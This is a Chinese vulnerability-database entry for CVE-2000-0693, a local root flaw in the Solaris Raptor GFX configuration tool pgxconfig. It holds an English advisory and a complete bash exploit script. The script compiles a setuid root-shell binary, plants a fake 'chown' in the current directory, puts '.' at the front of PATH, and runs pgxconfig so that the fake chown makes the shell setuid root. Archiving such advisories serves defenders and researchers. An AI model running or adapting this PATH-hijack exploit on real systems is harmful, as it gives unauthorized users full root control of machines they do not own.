Raptor GFX pgxconfig命令执行漏洞

Raptor GFX pgxconfig命令执行漏洞

漏洞ID 1105947 漏洞类型 未知
发布时间 2000-08-02 更新时间 2005-10-12
图片[1]-Raptor GFX pgxconfig命令执行漏洞-安全小百科CVE编号 CVE-2000-0693
图片[2]-Raptor GFX pgxconfig命令执行漏洞-安全小百科CNNVD-ID CNNVD-200010-051
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-051
|漏洞详情
RaptorGFX配置工具中的pgxconfig使用“cp”程序调用系统的相关路径名,本地用户可以利用该漏洞通过修改其指向交替“cp”程序的路径执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1563/info

Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems (GIS), satellite imaging, pre-press imaging and general desktop use. They can also be used for high resolution 8-bit applications such as Insignia's SoftWindows, medical imaging and many legacy applications.

Certain versions of the software shipped to configure the Raptor GFX cards are vulnerable to an PATH environment variable attack due to insecure code within pgxconfig the main configuration utility. In particular the pgxconfig uses an insecure system call (system(3s). This function effectively executes binaries resident on the system from within the program. Given that this call must execute binaries on the system at hand it relies on the $PATH variable to tell it where the system binaries reside. This variable is configurable by the user, and therefore a user can provide there own binary to be executed. In this particular case because the program also issues a setuid(0) call (a call which set's the UID of the process in this case, root) the program which the user substitutes is executed as root.


#!/usr/local/bin/bash

        # TechSource Raptor GFX configurator root exploit
        # [email protected]

        # unfortunately a compiler must be installed to use this example
        # exploit. however there's a million ways around this you know
        
        # on my system , gcc isnt in my path
        PATH=$PATH:/usr/local/bin

        # build a little prog nothing new here folks
        echo '#include<stdio.h>' > ./x.c
        echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
        gcc x.c -o foobar
        rm -f ./x.c

        # build a substitute chown command. i much prefer this over
        # regular chown
        echo "#!/bin/sh" > chown
        echo "/usr/bin/chown root ./foobar" >> chown
        echo "/usr/bin/chmod 4755 ./foobar" >> chown
        chmod 0755 chown

        # oooh look its the magical fairy path variable
        export PATH=.:$PATH
        
        # heres one way to skin a cat
        # (theres more, some need valid devices. excercise for the readers)
        /usr/sbin/pgxconfig -i
        rm -f chown

        ./foobar
|参考资料

来源:BID
名称:1563
链接:http://www.securityfocus.com/bid/1563
来源:BUGTRAQ
名称:20000802LocalrootcompromiseinPGXConfigSunSparcSolaris
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0463.html
来源:OSVDB
名称:1501
链接:http://www.osvdb.org/1501

相关推荐: SuSE gfxmenu GRUB Boot Loader Password Bypassing Vulnerability

SuSE gfxmenu GRUB Boot Loader Password Bypassing Vulnerability 漏洞ID 1101180 漏洞类型 Configuration Error 发布时间 2002-12-14 更新时间 2002-12-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享